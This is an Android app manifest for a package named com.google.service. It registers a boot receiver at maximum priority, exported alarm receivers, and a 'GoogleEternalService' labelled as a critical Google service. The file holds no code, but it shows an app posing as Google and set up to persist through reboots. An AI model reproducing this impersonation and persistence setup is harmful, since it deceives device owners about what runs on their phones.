<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.google.service"
    android:versionCode="2"
    android:versionName="1.0" >

    <uses-sdk
        android:minSdkVersion="14"
        android:targetSdkVersion="23" />

    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

    <application
        android:allowBackup="true"
        android:label="@string/app_name"
        android:theme="@android:style/Theme.Light.NoTitleBar" >
        <activity android:name="com.google.service.MainActivity" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name="com.google.service.GoogleEternalReceiver"
            android:enabled="true"
            android:exported="true" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.google.service.AlarmReceiver"
            android:enabled="true"
            android:exported="true" >
            <intent-filter>
                <action android:name="com.google.eternal.service.alarm_receiver" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.google.service.AlarmTaskReceiver"
            android:enabled="true"
            android:exported="true" >
            <intent-filter>
                <action android:name="com.google.eternal.service.alarm_task_receiver" />
            </intent-filter>
        </receiver>

        <service
            android:name="com.google.service.GoogleEternalService"
            android:label="Google 关键服务" />
    </application>

</manifest>